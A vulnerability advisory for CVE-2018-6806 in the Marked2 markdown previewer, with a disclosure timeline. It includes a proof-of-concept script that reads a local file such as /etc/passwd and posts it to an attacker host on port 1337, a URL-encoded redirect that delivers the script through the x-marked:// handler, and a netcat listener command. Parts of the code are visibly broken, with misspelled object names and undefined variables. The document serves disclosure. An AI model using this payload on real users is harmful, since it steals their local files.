

# Local File Disclosure in Marked2

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## **SUMMARY**

A local file disclosure vulnerability was identified in a markdown previewer – Marked2. This vulnerability would allow an attacker to read any local files from a victim's machine.

## **DESCRIPTION**

Marked allows the execution of arbitrary javascript, which allows an attacker to craft and inject malicious code in the context of the application. With two simple XMLHttpRequests, it is possible to steal local files from a victim's computer:

```
<body>
<script>
var file = "file:///dev.example.com:1337/";
function get(url) {
    var xmlHttp = new XMLHttpRequer ();
    xmlHttp.open("GET", url, false);
    xmlHttp.send(null);
    return xmlHttp.responseText;
}
function steal(data) {
    var xhr = new XMLHttpRequer ();
    xhr.open("POST", extract, true);
    xhr.onload = function() {};
    xhr.send(data);
}
var cdl = get(file);
steal(cdl);
</script>
</body>
```



Marked has a URL hander (x-marked://) to provide "additional scripting and workflow capabilities." One of the functions passed into the URL handler is "preview". It renders and previews markdown specified in the ?text= parameter.

#### PRACTICAL EXPLOITATION

1. An attacker creates and hosts a malicious HTML that redirects to the URL Handler, calling the **preview** function.

<meta http-equiv="refresh" content="0;URL='xmarked://preview?text=%3Cbody%3E%0A%3Cscript%3E%0Avar%20file%20%3D%20%22file%
3A%2F%2F%2Fetc%2Fpasswd%22%3B%0Avar%20extract%20%3D%20%22http%3A%2F%2Fdev.exa
mple.com%3A1337%2F%22%3B%0Afunction%20get(url)%20%7B%0A%20%20%20%20var%20xmlH
ttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20xmlHttp.open(%22GET%22%2C
%20url%2C%20false)%3B%0A%20%20%20%20xmlHttp.send(null)%3B%0A%20%20%20var%
20xmlHttp.responseText%3B%0A%7D%0Afunction%20steal(data)%20%7B%0A%20%20var%
20xhr%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20xhr.open(%27POST%27%2C%20extract%2C%20true)%3B%0A%20%20xhr.onload%20%3D%20function()%20%7B%7D%3B%0A%20%20xhr.send(data)%3B%0A%7D%0Avar%20cdl%20%3D%20get(file)%3B%0Asteal(cdl)%3B%0A%3C
%2Fscript%3E%0A%3C%2Fbody%3E%0A'" />

- 2. The attacker starts a **netcat** listener on his server: nc -klvp 1337
- 3. The victim visits the HTML page and the attacker's payload is automatically previewed in Marked2.
- 4. The script executes in the context of the application, stealing a local file and sending it to the attacker's server on port 1337.

VIDEO: https://youtu.be/2mZTrLs8k48



# **REMEDIATION**

The developers of Marked2 have not released an update yet.

# **TIMELINE**

2/6/2018 – Vulnerability reported to Marked2

2/6/2018 – Response from developer: next update will include patch

2/6/2018 – Permission to publicly disclose

2/6/2018 – Assigned CVE-2018-6806